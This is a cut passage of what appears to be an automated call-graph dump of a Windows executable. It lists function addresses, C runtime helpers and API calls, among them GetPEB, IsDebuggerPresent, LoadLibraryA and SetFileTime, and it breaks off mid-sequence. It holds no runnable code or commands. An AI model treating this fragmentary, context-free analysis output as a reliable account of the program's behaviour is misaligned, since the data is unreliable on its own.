RtlLeaveCriticalSection 96213->96248 96215 15e5de 96215->96180 96217 157d88 __getstream 96216->96217 96218 157d91 96217->96218 96219 157da9 96217->96219 96249 1581c2 47 API calls 2 library calls 96218->96249 96222 1569d0 __malloc_crt 46 API calls 96219->96222 96226 157dc9 __getstream 96219->96226 96221 157d96 96250 15821f 47 API calls 7 library calls 96221->96250 96224 157dbd 96222->96224 96227 157dc4 96224->96227 96228 157dd3 96224->96228 96225 157d9d 96251 151145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 96225->96251 96226->96175 96252 157c0e 47 API calls __getptd_noexit 96227->96252 96229 157cf4 __lock 46 API calls 96228->96229 96232 157dda 96229->96232 96234 157dfe 96232->96234 96235 157de9 InitializeCriticalSectionAndSpinCount 96232->96235 96253 151c9d 96234->96253 96237 157e04 96235->96237 96259 157e1a RtlLeaveCriticalSection _doexit 96237->96259 96239->96175 96240->96175 96244 1569de 96241->96244 96242 15395c __malloc_crt 46 API calls 96242->96244 96243 156a12 96243->96181 96243->96184 96244->96242 96244->96243 96245 1569f1 Sleep 96244->96245 96246 156a0a 96245->96246 96246->96243 96246->96244 96248->96215 96249->96221 96250->96225 96252->96226 96254 151ca6 RtlFreeHeap 96253->96254 96255 151ccf _free 96253->96255 96254->96255 96256 151cbb 96254->96256 96255->96237 96260 157c0e 47 API calls __getptd_noexit 96256->96260 96258 151cc1 GetLastError 96258->96255 96259->96226 96260->96258 96269 165bb1 96261->96269 96263 1663e2 96263->96193 96264->96190 96265->96193 96266->96196 96267->96198 96268->96200 96270 165bbd __getstream 96269->96270 96271 165bcf 96270->96271 96273 165c06 96270->96273 96353 157c0e 47 API calls __getptd_noexit 96271->96353 96280 165c78 96273->96280 96274 165bd4 96354 156e10 8 API calls ___wstrgtold12_l 96274->96354 96277 165c23 96355 165c4c RtlLeaveCriticalSection __unlock_fhandle 96277->96355 96279 165bde __getstream 96279->96263 96281 165c98 96280->96281 96282 15273b __wsopen_helper 47 API calls 96281->96282 96285 165cb4 96282->96285 96283 156e20 __invoke_watson 8 API calls 96284 1663c8 96283->96284 96286 165bb1 __wsopen_helper 104 API calls 96284->96286 96287 165cee 96285->96287 96292 165d11 96285->96292 96303 165deb 96285->96303 96288 1663e2 96286->96288 96289 157bda __free_osfhnd 47 API calls 96287->96289 96288->96277 96290 165cf3 96289->96290 96291 157c0e ___wstrgtold12_l 47 API calls 96290->96291 96293 165d00 96291->96293 96294 165dcf 96292->96294 96302 165dad 96292->96302 96295 156e10 ___wstrgtold12_l 8 API calls 96293->96295 96296 157bda __free_osfhnd 47 API calls 96294->96296 96298 165d0a 96295->96298 96297 165dd4 96296->96297 96299 157c0e ___wstrgtold12_l 47 API calls 96297->96299 96298->96277 96300 165de1 96299->96300 96301 156e10 ___wstrgtold12_l 8 API calls 96300->96301 96301->96303 96304 15a979 __wsopen_helper 52 API calls 96302->96304 96303->96283 96305 165e7b 96304->96305 96306 165ea6 96305->96306 96307 165e85 96305->96307 96309 165b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 96306->96309 96308 157bda __free_osfhnd 47 API calls 96307->96308 96310 165e8a 96308->96310 96320 165ec8 96309->96320 96311 157c0e ___wstrgtold12_l 47 API calls 96310->96311 96313 165e94 96311->96313 96312 165f46 GetFileType 96314 165f93 96312->96314 96315 165f51 GetLastError 96312->96315 96318 157c0e ___wstrgtold12_l 47 API calls 96313->96318 96324 15ac0b __set_osfhnd 48 API calls 96314->96324 96319 157bed __dosmaperr 47 API calls 96315->96319 96316 165f14 GetLastError 96317 157bed __dosmaperr 47 API calls 96316->96317 96321 165f39 96317->96321 96318->96298 96322 165f78 CloseHandle 96319->96322 96320->96312 96320->96316 96323 165b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 96320->96323 96327 157c0e ___wstrgtold12_l 47 API calls 96321->96327 96322->96321 96325 165f86 96322->96325 96326 165f09 96323->96326 96331 165fb1 96324->96331 96328 157c0e ___wstrgtold12_l 47 API calls 96325->96328 96326->96312 96326->96316 96327->96303 96329 165f8b 96328->96329 96329->96321 96330 16616c 96330->96303 96333 16633f CloseHandle 96330->96333 96331->96330 96332 15f82f __lseeki64_nolock 49 API calls 96331->96332 96347 166032 96331->96347 96334 16601b 96332->96334 96335 165b20 ___createFile GetModuleHandleW GetProcAddress CreateFileW 96333->96335 96337 157bda __free_osfhnd 47 API calls 96334->96337 96334->96347 96336 166366 96335->96336 96338 16639a 96336->96338 96339 16636e GetLastError 96336->96339 96337->96347 96338->96303 96340 157bed __dosmaperr 47 API calls 96339->96340 96341 16637a 96340->96341 96345 15ab1e __free_osfhnd 48 API calls 96341->96345 96342 15ea9c __close_nolock 50 API calls 96342->96347 96343 15ee0e 59 API calls __filbuf 96343->96347 96344 166f40 __chsize_nolock 81 API calls 96344->96347 96345->96338 96346 15af61 __flush 78 API calls 96346->96347 96347->96330 96347->96342 96347->96343 96347->96344 96347->96346 96348 1661e9 96347->96348 96351 15f82f 49 API calls __lseeki64_nolock 96347->96351 96349 15ea9c __close_nolock 50 API calls 96348->96349 96350 1661f0 96349->96350 96352 157c0e ___wstrgtold12_l 47 API calls 96350->96352 96351->96347 96352->96303 96353->96274 96354->96279 96355->96279 96360 1342f6 96356->96360 96359 1342cc LoadLibraryA GetProcAddress 96359->96109 96361 1342aa 96360->96361 96362 1342ff LoadLibraryA 96360->96362 96361->96109 96361->96359 96362->96361 96363 134310 GetProcAddress 96362->96363 96363->96361 96365 134085 FindResourceExW 96364->96365 96369 1340a2 96364->96369 96366 1a4f16 LoadResource 96365->96366 96365->96369 96367 1a4f2b SizeofResource 96366->96367 96366->96369 96368 1a4f3f LockResource 96367->96368 96367->96369 96368->96369 96369->96123 96371 134526 96370->96371 96374 1a4fe0 96370->96374 96376 153a8d 96371->96376 96373 134534 96373->96129 96375->96123 96377 153a99 __getstream 96376->96377 96378 153aa7 96377->96378 96380 153acd 96377->96380 96389 157c0e 47 API calls __getptd_noexit 96378->96389 96391 154e1c 96380->96391 96381 153aac 96390 156e10 8 API calls ___wstrgtold12_l 96381->96390 96386 153ae2 96398 153b04 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 96386->96398 96388 153ab7 __getstream 96388->96373 96389->96381 96390->96388 96392 154e2c 96391->96392 96393 154e4e RtlEnterCriticalSection 96391->96393 96392->96393 96394 154e34 96392->96394 96396 153ad3 96393->96396 96395 157cf4 __lock 47 API calls 96394->96395 96395->96396 96397 1539fe 81 API calls 4 library calls 96396->96397 96397->96386 96398->96388 96402 153839 96399->96402 96401 134510 96401->96137 96403 153845 __getstream 96402->96403 96404 153888 96403->96404 96405 15385b _memset 96403->96405 96414 153880 __getstream 96403->96414 96406 154e1c __lock_file 48 API calls 96404->96406 96429 157c0e 47 API calls __getptd_noexit 96405->96429 96408 15388e 96406->96408 96415 15365b 96408->96415 96409 153875 96430 156e10 8 API calls ___wstrgtold12_l 96409->96430 96414->96401 96419 153676 _memset 96415->96419 96421 153691 96415->96421 96416 153681 96527 157c0e 47 API calls __getptd_noexit 96416->96527 96418 153686 96528 156e10 8 API calls ___wstrgtold12_l 96418->96528 96419->96416 96419->96421 96426 1536cf 96419->96426 96431 1538c2 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 96421->96431 96423 1537e0 _memset 96530 157c0e 47 API calls __getptd_noexit 96423->96530 96426->96421 96426->96423 96432 152933 96426->96432 96439 15ee0e 96426->96439 96507 15eb66 96426->96507 96529 15ec87 47 API calls 3 library calls 96426->96529 96429->96409 96430->96414 96431->96414 96433 152952 96432->96433 96434 15293d 96432->96434 96433->96426 96531 157c0e 47 API calls __getptd_noexit 96434->96531 96436 152942 96532 156e10 8 API calls ___wstrgtold12_l 96436->96532 96438 15294d 96438->96426 96440 15ee46 96439->96440 96441 15ee2f 96439->96441 96443 15f57e 96440->96443 96448 15ee80 96440->96448 96542 157bda 47 API calls __getptd_noexit 96441->96542 96557 157bda 47 API calls __getptd_noexit 96443->96557 96445 15ee34 96543 157c0e 47 API calls __getptd_noexit 96445->96543 96446 15f583 96558 157c0e 47 API calls __getptd_noexit 96446->96558 96449 15ee88 96448->96449 96455 15ee9f 96448->96455 96544 157bda 47 API calls __getptd_noexit 96449->96544 96452 15ee3b 96452->96426 96454 15eeb4 96546 157bda 47 API calls __getptd_noexit 96454->96546 96455->96452 96455->96454 96458 15eeec 96455->96458 96461 15eece 96455->96461 96462 1569d0 __malloc_crt 47 API calls 96458->96462 96459 15ee94 96559 156e10 8 API calls ___wstrgtold12_l 96459->96559 96460 15ee8d 96545 157c0e 47 API calls __getptd_noexit 96460->96545 96461->96454 96463 15eed9 96461->96463 96464 15eefc 96462->96464 96533 163bf2 96463->96533 96466 15ef04 96464->96466 96467 15ef1f 96464->96467 96547 157c0e 47 API calls __getptd_noexit 96466->96547 96549 15f82f 49 API calls 3 library calls 96467->96549 96468 15efed 96470 15f066 ReadFile 96468->96470 96475 15f003 GetConsoleMode 96468->96475 96473 15f546 GetLastError 96470->96473 96474 15f088 96470->96474 96472 15ef09 96548 157bda 47 API calls __getptd_noexit 96472->96548 96477 15f553 96473->96477 96478 15f046 96473->96478 96474->96473 96482 15f058 96474->96482 96479 15f017 96475->96479 96480 15f063 96475->96480 96555 157c0e 47 API calls __getptd_noexit 96477->96555 96491 15f04c 96478->96491 96550 157bed 47 API calls 3 library calls 96478->96550 96479->96480 96483 15f01d ReadConsoleW 96479->96483 96480->96470 96489 15f0bd 96482->96489 96490 15f32a 96482->96490 96482->96491 96483->96482 96484 15f040 GetLastError 96483->96484 96484->96478 96486 15f558 96556 157bda 47 API calls __getptd_noexit 96486->96556 96488 151c9d _free 47 API calls 96488->96452 96493 15f129 ReadFile 96489->96493 96499 15f1aa 96489->96499 96490->96491 96497 15f430 ReadFile 96490->96497 96491->96452 96491->96488 96494 15f14a GetLastError 96493->96494 96503 15f154 96493->96503 96494->96503 96495 15f267 96501 15f217 MultiByteToWideChar 96495->96501 96553 15f82f 49 API calls 3 library calls 96495->96553 96496 15f257 96552 157c0e 47 API calls __getptd_noexit 96496->96552 96498 15f453 GetLastError 96497->96498 96506 15f461 96497->96506 96498->96506 96499->96491 96499->96495 96499->96496 96499->96501 96501->96484 96501->96491 96503->96489 96551 15f82f 49 API calls 3 library calls 96503->96551 96506->96490 96554 15f82f 49 API calls 3 library calls 96506->96554 96508 15eb71 96507->96508 96511 15eb86 96507->96511 96590 157c0e 47 API calls __getptd_noexit 96508->96590 96510 15eb76 96591 156e10 8 API calls ___wstrgtold12_l 96510->96591 96513 15ebbb 96511->96513 96519 15eb81 96511->96519 96592 163e24 96511->96592 96515 152933 __fseek_nolock 47 API calls 96513->96515 96516 15ebcf 96515->96516 96560 15ed06 96516->96560 96518 15ebd6 96518->96519 96520 152933 __fseek_nolock 47 API calls 96518->96520 96519->96426 96521 15ebf9 96520->96521 96521->96519 96522 152933 __fseek_nolock 47 API calls 96521->96522 96523 15ec05 96522->96523 96523->96519 96524 152933 __fseek_nolock 47 API calls 96523->96524 96525 15ec12 96524->96525 96526 152933 __fseek_nolock 47 API calls 96525->96526 96526->96519 96527->96418 96528->96421 96529->96426 96530->96418 96531->96436 96532->96438 96534 163bfd 96533->96534 96535 163c0a 96533->96535 96536 157c0e ___wstrgtold12_l 47 API calls 96534->96536 96538 163c16 96535->96538 96539 157c0e ___wstrgtold12_l 47 API calls 96535->96539 96537 163c02 96536->96537 96537->96468 96538->96468 96540 163c37 96539->96540 96541 156e10 ___wstrgtold12_l 8 API calls 96540->96541 96541->96537 96542->96445 96543->96452 96544->96460 96545->96459 96546->96460 96547->96472 96548->96452 96549->96463 96550->96491 96551->96503 96552->96491 96553->96501 96554->96506 96555->96486 96556->96491 96557->96446 96558->96459 96559->96452 96561 15ed12 __getstream 96560->96561 96562 15ed32 96561->96562 96563 15ed1a 96561->96563 96565 15eded 96562->96565 96570 15ed68 96562->96570 96564 157bda __free_osfhnd 47 API calls 96563->96564 96567 15ed1f 96564->96567 96566 157bda __free_osfhnd 47 API calls 96565->96566 96568 15edf2 96566->96568 96569 157c0e ___wstrgtold12_l 47 API calls 96567->96569 96571 157c0e ___wstrgtold12_l 47 API calls 96568->96571 96583 15ed27 __getstream 96569->96583 96572 15ed75 96570->96572 96573 15ed8a 96570->96573 96575 15ed82 96571->96575 96576 157bda __free_osfhnd 47 API calls 96572->96576 96574 15a8ed ___lock_fhandle 49 API calls 96573->96574 96577 15ed90 96574->96577 96582 156e10 ___wstrgtold12_l 8 API calls 96575->96582 96578 15ed7a 96576->96578 96580 15edb6 96577->96580 96581 15eda3 96577->96581 96579 157c0e ___wstrgtold12_l 47 API calls 96578->96579 96579->96575 96585 157c0e ___wstrgtold12_l 47 API calls 96580->96585 96584 15ee0e __filbuf 59 API calls 96581->96584 96582->96583 96583->96518 96586 15edaf 96584->96586 96587 15edbb 96585->96587 96589 15ede5 __filbuf RtlLeaveCriticalSection 96586->96589 96588 157bda __free_osfhnd 47 API calls 96587->96588 96588->96586 96589->96583 96590->96510 96591->96519 96593 1569d0 __malloc_crt 47 API calls 96592->96593 96594 163e39 96593->96594 96594->96513 96598 15344a GetSystemTimeAsFileTime 96595->96598 96597 17bdc3 96597->96139 96599 153478 __aulldiv 96598->96599 96599->96597 96601 153e71 __getstream 96600->96601 96602 153e94 96601->96602 96603 153e7f 96601->96603 96605 154e1c __lock_file 48 API calls 96602->96605 96614 157c0e 47 API calls __getptd_noexit 96603->96614 96607 153e9a 96605->96607 96606 153e84 96615 156e10 8 API calls ___wstrgtold12_l 96606->96615 96616 153b0c 55 API calls 4 library calls 96607->96616 96610 153ea5 96617 153ec5 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 96610->96617 96611 153e8f __getstream 96611->96143 96613 153eb7 96613->96611 96614->96606 96615->96611 96616->96610 96617->96613 96618->96074 96620 152aba __getstream 96619->96620 96621 152ad4 96620->96621 96622 152aec 96620->96622 96624 152ae4 __getstream 96620->96624 96697 157c0e 47 API calls __getptd_noexit 96621->96697 96625 154e1c __lock_file 48 API calls 96622->96625 96624->96077 96627 152af2 96625->96627 96626 152ad9 96698 156e10 8 API calls ___wstrgtold12_l 96626->96698 96685 152957 96627->96685 96633 1535f0 __getstream 96632->96633 96634 153604 96633->96634 96635 15361c 96633->96635 96877 157c0e 47 API calls __getptd_noexit 96634->96877 96638 154e1c __lock_file 48 API calls 96635->96638 96641 153614 __getstream 96635->96641 96637 153609 96878 156e10 8 API calls ___wstrgtold12_l 96637->96878 96640 15362e 96638->96640 96861 153578 96640->96861 96641->96078 96646 17c715 96645->96646 96647 17c6ff SetFileTime CloseHandle 96645->96647 96646->96055 96647->96646 96653 17c581 __tzset_nolock _wcscmp 96648->96653 96649 1344ed 64 API calls 96649->96653 96650 17c05f 96650->96052 96650->96055 96651 17bf5a GetSystemTimeAsFileTime 96651->96653 96652 134517 83 API calls 96652->96653 96653->96649 96653->96650 96653->96651 96653->96652 96655 17b970 96654->96655 96656 17b97e 96654->96656 96657 153499 117 API calls 96655->96657 96658 17b9c3 96656->96658 96659 153499 117 API calls 96656->96659 96684 17b987 96656->96684 96657->96656 96951 17bbe8 96658->96951 96661 17b9a8 96659->96661 96661->96658 96663 17b9b1 96661->96663 96662 17ba07 96664 17ba2c 96662->96664 96665 17ba0b 96662->96665 96667 1535e4 __fcloseall 83 API calls 96663->96667 96663->96684 96955 17b7e5 96664->96955 96666 17ba18 96665->96666 96669 1535e4 __fcloseall 83 API calls 96665->96669 96671 1535e4 __fcloseall 83 API calls 96666->96671 96666->96684 96667->96684 96669->96666 96671->96684 96684->96081 96686 152984 96685->96686 96688 152966 96685->96688 96699 152b24 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 96686->96699 96687 152974 96746 157c0e 47 API calls __getptd_noexit 96687->96746 96688->96686 96688->96687 96695 15299c _memcpy_s 96688->96695 96690 152979 96747 156e10 8 API calls ___wstrgtold12_l 96690->96747 96694 152933 __fseek_nolock 47 API calls 96694->96695 96695->96686 96695->96694 96700 15af61 96695->96700 96725 158e63 96695->96725 96748 152c84 96695->96748 96697->96626 96698->96624 96699->96624 96701 15af6d __getstream 96700->96701 96702 15af75 96701->96702 96703 15af8d 96701->96703 96827 157bda 47 API calls __getptd_noexit 96702->96827 96705 15b022 96703->96705 96709 15afbf 96703->96709 96832 157bda 47 API calls __getptd_noexit 96705->96832 96706 15af7a 96828 157c0e 47 API calls __getptd_noexit 96706->96828 96754 15a8ed 96709->96754 96710 15b027 96833 157c0e 47 API calls __getptd_noexit 96710->96833 96713 15afc5 96715 15afd8 96713->96715 96716 15afeb 96713->96716 96714 15b02f 96834 156e10 8 API calls ___wstrgtold12_l 96714->96834 96763 15b043 96715->96763 96829 157c0e 47 API calls __getptd_noexit 96716->96829 96720 15af82 __getstream 96720->96695 96721 15aff0 96830 157bda 47 API calls __getptd_noexit 96721->96830 96726 152933 __fseek_nolock 47 API calls 96725->96726 96727 158e71 96726->96727 96728 158e93 96727->96728 96729 158e7c 96727->96729 96731 158e98 96728->96731 96739 158ea5 __flswbuf 96728->96739 96858 157c0e 47 API calls __getptd_noexit 96729->96858 96859 157c0e 47 API calls __getptd_noexit 96731->96859 96732 158e81 96732->96695 96734 158f83 96736 15af61 __flush 78 API calls 96734->96736 96735 158f09 96737 158f23 96735->96737 96741 158f3a 96735->96741 96736->96732 96738 15af61 __flush 78 API calls 96737->96738 96738->96732 96739->96732 96740 163bf2 __flswbuf 47 API calls 96739->96740 96742 158ef4 96739->96742 96745 158eff 96739->96745 96740->96742 96741->96732 96860 15f733 52 API calls 6 library calls 96741->96860 96744 163e24 __getbuf 47 API calls 96742->96744 96742->96745 96744->96745 96745->96734 96745->96735 96746->96690 96747->96686 96749 152c97 96748->96749 96753 152cbb 96748->96753 96750 152933 __fseek_nolock 47 API calls 96749->96750 96749->96753 96751 152cb4 96750->96751 96752 15af61 __flush 78 API calls 96751->96752 96752->96753 96753->96695 96755 15a8f9 __getstream 96754->96755 96756 15a946 RtlEnterCriticalSection 96755->96756 96757 157cf4 __lock 47 API calls 96755->96757 96758 15a96c __getstream 96756->96758 96759 15a91d 96757->96759 96758->96713 96760 15a928 InitializeCriticalSectionAndSpinCount 96759->96760 96761 15a93a 96759->96761 96760->96761 96835 15a970 RtlLeaveCriticalSection _doexit 96761->96835 96764 15b050 __ftell_nolock 96763->96764 96827->96706 96828->96720 96829->96721 96832->96710 96833->96714 96834->96720 96835->96756 96858->96732 96859->96732 96860->96732 96862 153587 96861->96862 96863 15359b 96861->96863 96907 157c0e 47 API calls __getptd_noexit 96862->96907 96865 153597 96863->96865 96867 152c84 __flush 78 API calls 96863->96867 96879 153653 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 96865->96879 96866 15358c 96908 156e10 8 API calls ___wstrgtold12_l 96866->96908 96869 1535a7 96867->96869 96880 15eb36 96869->96880 96872 152933 __fseek_nolock 47 API calls 96873 1535b5 96872->96873 96884 15e9d2 96873->96884 96877->96637 96878->96641 96879->96641 96881 1535af 96880->96881 96882 15eb43 96880->96882 96881->96872 96882->96881 96883 151c9d _free 47 API calls 96882->96883 96883->96881 96885 15e9de __getstream 96884->96885 96886 15e9e6 96885->96886 96887 15e9fe 96885->96887 96924 157bda 47 API calls __getptd_noexit 96886->96924 96888 15ea7b 96887->96888 96893 15ea28 96887->96893 96928 157bda 47 API calls __getptd_noexit 96888->96928 96891 15e9eb 96925 157c0e 47 API calls __getptd_noexit 96891->96925 96892 15ea80 96896 15a8ed ___lock_fhandle 49 API calls 96893->96896 96898 15ea2e 96896->96898 96900 15ea41 96898->96900 96901 15ea4c 96898->96901 96907->96866 96908->96865 96924->96891 96928->96892 96952 17bc0d 96951->96952 96954 17bbf6 _memcpy_s __tzset_nolock 96951->96954 96953 15381e __fread_nolock 64 API calls 96952->96953 96953->96954 96954->96662 96956 15395c __malloc_crt 47 API calls 96955->96956 96957 17b7f4 96956->96957 96958 15395c __malloc_crt 47 API calls 96957->96958 96959 17b808 96958->96959 96960 15395c __malloc_crt 47 API calls 96959->96960 96961 17b81c 96960->96961 97012 177d310 97026 177af10 97012->97026 97014 177d3cb 97029 177d200 97014->97029 97032 177e410 GetPEB 97026->97032 97028 177b59b 97028->97014 97030 177d209 Sleep 97029->97030 97031 177d217 97030->97031 97033 177e43a 97032->97033 97033->97028 97034 1a19dd 97039 134a30 97034->97039 97036 1a19f1 97059 150f0a 52 API calls __cinit 97036->97059 97038 1a19fb 97040 134a40 __ftell_nolock 97039->97040 97041 13d7f7 48 API calls 97040->97041 97042 134af6 97041->97042 97060 135374 97042->97060 97044 134aff 97067 13363c 97044->97067 97047 13518c 48 API calls 97048 134b18 97047->97048 97073 1364cf 97048->97073 97051 13d7f7 48 API calls 97052 134b32 97051->97052 97079 1349fb 97052->97079 97054 1361a6 48 API calls 97058 134b3d _wcscat Mailbox __wsetenvp 97054->97058 97055 134b43 Mailbox 97055->97036 97056 13ce19 48 API calls 97056->97058 97057 1364cf 48 API calls 97057->97058 97058->97054 97058->97055 97058->97056 97058->97057 97059->97038 97093 15f8a0 97060->97093 97063 13ce19 48 API calls 97064 1353a7 97063->97064 97095 13660f 97064->97095 97066 1353b1 Mailbox 97066->97044 97068 133649 __ftell_nolock 97067->97068 97102 13366c GetFullPathNameW 97068->97102 97070 13365a 97071 136a63 48 API calls 97070->97071 97072 133669 97071->97072 97072->97047 97074 13651b 97073->97074 97078 1364dd _memcpy_s 97073->97078 97077 14f4ea 48 API calls 97074->97077 97075 14f4ea 48 API calls 97076 134b29 97075->97076 97076->97051 97077->97078 97078->97075 97080 13bcce 48 API calls 97079->97080 97081 134a0a RegOpenKeyExW 97080->97081 97082 1a41cc RegQueryValueExW 97081->97082 97083 134a2b 97081->97083 97084 1a4246 RegCloseKey 97082->97084 97085 1a41e5 97082->97085 97083->97058 97086 14f4ea 48 API calls 97085->97086 97087 1a41fe 97086->97087 97088 1347b7 48 API calls 97087->97088 97089 1a4208 RegQueryValueExW 97088->97089 97090 1a423b 97089->97090 97091 1a4224 97089->97091 97090->97084 97092 136a63 48 API calls 97091->97092 97092->97090 97094 135381 GetModuleFileNameW 97093->97094 97094->97063 97096 15f8a0 __ftell_nolock 97095->97096 97097 13661c GetFullPathNameW 97096->97097 97098 136a63 48 API calls 97097->97098 97099 136643 97098->97099 97100 136571 48 API calls 97099->97100 97101 13664f 97100->97101 97101->97066 97103 13368a 97102->97103 97103->97070 97104 155dfd 97105 155e09 __getstream 97104->97105 97141 157eeb GetStartupInfoW 97105->97141 97107 155e0e 97143 159ca7 GetProcessHeap 97107->97143 97109 155e66 97110 155e71 97109->97110 97225 155f4d 47 API calls 3 library calls 97109->97225 97144 157b47 97110->97144 97113 155e77 97114 155e82 __RTC_Initialize 97113->97114 97226 155f4d 47 API calls 3 library calls 97113->97226 97165 15acb3 97114->97165 97117 155e91 97118 155e9d GetCommandLineW 97117->97118 97227 155f4d 47 API calls 3 library calls 97117->97227 97184 162e7d GetEnvironmentStringsW 97118->97184 97121 155e9c 97121->97118 97124 155eb7 97125 155ec2 97124->97125 97228 15115b 47 API calls 3 library calls 97124->97228 97194 162cb4 97125->97194 97128 155ec8 97129 155ed3 97128->97129 97229 15115b 47 API calls 3 library calls 97128->97229 97208 151195 97129->97208 97132 155edb 97133 155ee6 __wwincmdln 97132->97133 97230 15115b 47 API calls 3 library calls 97132->97230 97212 133a0f 97133->97212 97142 157f01 97141->97142 97142->97107 97143->97109 97233 15123a 30 API calls 2 library calls 97144->97233 97146 157b4c 97234 157e23 InitializeCriticalSectionAndSpinCount 97146->97234 97148 157b51 97149 157b55 97148->97149 97236 157e6d TlsAlloc 97148->97236 97235 157bbd 50 API calls 2 library calls 97149->97235 97152 157b67 97152->97149 97154 157b72 97152->97154 97153 157b5a 97153->97113 97237 156986 97154->97237 97157 157bb4 97245 157bbd 50 API calls 2 library calls 97157->97245 97160 157b93 97160->97157 97162 157b99 97160->97162 97161 157bb9 97161->97113 97244 157a94 47 API calls 4 library calls 97162->97244 97164 157ba1 GetCurrentThreadId 97164->97113 97166 15acbf __getstream 97165->97166 97167 157cf4 __lock 47 API calls 97166->97167 97168 15acc6 97167->97168 97169 156986 __calloc_crt 47 API calls 97168->97169 97170 15acd7 97169->97170 97171 15ad42 GetStartupInfoW 97170->97171 97174 15ace2 @_EH4_CallFilterFunc@8 __getstream 97170->97174 97179 15ae80 97171->97179 97181 15ad57 97171->97181 97172 15af44 97254 15af58 RtlLeaveCriticalSection _doexit 97172->97254 97174->97117 97175 15aec9 GetStdHandle 97175->97179 97176 156986 __calloc_crt 47 API calls 97176->97181 97177 15aedb GetFileType 97177->97179 97178 15ada5 97178->97179 97182 15ade5 InitializeCriticalSectionAndSpinCount 97178->97182 97183 15add7 GetFileType 97178->97183 97179->97172 97179->97175 97179->97177 97180 15af08 InitializeCriticalSectionAndSpinCount 97179->97180 97180->97179 97181->97176 97181->97178 97181->97179 97182->97178 97183->97178 97183->97182 97185 155ead 97184->97185 97186 162e8e 97184->97186 97190 162a7b GetModuleFileNameW 97185->97190 97187 1569d0 __malloc_crt 47 API calls 97186->97187 97188 162eb4 _memcpy_s 97187->97188 97189 162eca FreeEnvironmentStringsW 97188->97189 97189->97185 97191 162aaf _wparse_cmdline 97190->97191 97192 1569d0 __malloc_crt 47 API calls 97191->97192 97193 162aef _wparse_cmdline 97191->97193 97192->97193 97193->97124 97195 162ccd __wsetenvp 97194->97195 97199 162cc5 97194->97199 97196 156986 __calloc_crt 47 API calls 97195->97196 97204 162cf6 __wsetenvp 97196->97204 97197 162d4d 97198 151c9d _free 47 API calls 97197->97198 97198->97199 97199->97128 97200 156986 __calloc_crt 47 API calls 97200->97204 97201 162d72 97202 151c9d _free 47 API calls 97201->97202 97202->97199 97204->97197 97204->97199 97204->97200 97204->97201 97205 162d89 97204->97205 97255 162567 47 API calls ___wstrgtold12_l 97204->97255 97256 156e20 IsProcessorFeaturePresent 97205->97256 97207 162d95 97207->97128 97209 1511a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 97208->97209 97211 1511e0 __IsNonwritableInCurrentImage 97209->97211 97271 150f0a 52 API calls __cinit 97209->97271 97211->97132 97213 1a1ebf 97212->97213 97214 133a29 97212->97214 97215 133a63 74B1C8D0 97214->97215 97272 151405 97215->97272 97219 133a8f 97284 133adb SystemParametersInfoW SystemParametersInfoW 97219->97284 97221 133a9b 97285 133d19 97221->97285 97225->97110 97226->97114 97227->97121 97233->97146 97234->97148 97235->97153 97236->97152 97239 15698d 97237->97239 97240 1569ca 97239->97240 97241 1569ab Sleep 97239->97241 97246 1630aa 97239->97246 97240->97157 97243 157ec9 TlsSetValue 97240->97243 97242 1569c2 97241->97242 97242->97239 97242->97240 97243->97160 97244->97164 97245->97161 97247 1630b5 97246->97247 97252 1630d0 __calloc_impl 97246->97252 97248 1630c1 97247->97248 97247->97252 97253 157c0e 47 API calls __getptd_noexit 97248->97253 97250 1630e0 RtlAllocateHeap 97251 1630c6 97250->97251 97250->97252 97251->97239 97252->97250 97252->97251 97253->97251 97254->97174 97255->97204 97257 156e2b 97256->97257 97262 156cb5 97257->97262 97261 156e46 97261->97207 97263 156ccf _memset __call_reportfault 97262->97263 97264 156cef IsDebuggerPresent 97263->97264 97270 1581ac SetUnhandledExceptionFilter UnhandledExceptionFilter 97264->97270 97266 15a70c ___wstrgtold12_l 6 API calls 97268 156dd6 97266->97268 97267 156db3 __call_reportfault 97267->97266 97269 158197 GetCurrentProcess TerminateProcess 97268->97269 97269->97261 97270->97267 97271->97211 97273 157cf4 __lock 47 API calls 97272->97273 97274 151410 97273->97274 97337 157e58 RtlLeaveCriticalSection 97274->97337 97276 133a88 97277 15146d 97276->97277 97278 151491 97277->97278 97279 151477 97277->97279 97278->97219 97279->97278 97338 157c0e 47 API calls __getptd_noexit 97279->97338 97281 151481 97339 156e10 8 API calls ___wstrgtold12_l 97281->97339 97283 15148c 97283->97219 97284->97221 97286 133d26 __ftell_nolock 97285->97286 97287 13d7f7 48 API calls 97286->97287 97288 133d31 GetCurrentDirectoryW 97287->97288 97340 1361ca 97288->97340 97290 133d57 IsDebuggerPresent 97291 133d65 97290->97291 97292 1a1cc1 MessageBoxA 97290->97292 97294 1a1cd9 97291->97294 97295 133d82 97291->97295 97323 133e3a 97291->97323 97292->97294 97293 133e41 SetCurrentDirectoryW 97296 133e4e Mailbox 97293->97296 97514 14c682 48 API calls 97294->97514 97414 1340e5 97295->97414 97299 1a1ce9 97323->97293 97337->97276 97338->97281 97339->97283 97517 14e99b 97340->97517 97344 1361eb 97345 135374 50 API calls 97344->97345 97346 1361ff 97345->97346 97347 13ce19 48 API calls 97346->97347 97348 13620c 97347->97348 97534 1339db 97348->97534 97350 136216 Mailbox 97351 136eed 48 API calls 97350->97351 97352 13622b 97351->97352 97546 139048 97352->97546 97355 13ce19 48 API calls 97356 136244 97355->97356 97357 13d6e9 55 API calls 97356->97357 97358 136254 Mailbox 97357->97358 97359 13ce19 48 API calls 97358->97359 97360 13627c 97359->97360 97361 13d6e9 55 API calls 97360->97361 97362 13628f Mailbox 97361->97362 97363 13ce19 48 API calls 97362->97363 97364 1362a0 97363->97364 97365 13d645 53 API calls 97364->97365 97366 1362b2 Mailbox 97365->97366 97367 13d7f7 48 API calls 97366->97367 97368 1362c5 97367->97368 97549 1363fc 97368->97549 97372 1362df 97373 1a1c08 97372->97373 97374 1362e9 97372->97374 97375 1363fc 48 API calls 97373->97375 97376 150fa7 _W_store_winword 59 API calls 97374->97376 97377 1a1c1c 97375->97377 97378 1362f4 97376->97378 97380 1363fc 48 API calls 97377->97380 97378->97377 97379 1362fe 97378->97379 97381 150fa7 _W_store_winword 59 API calls 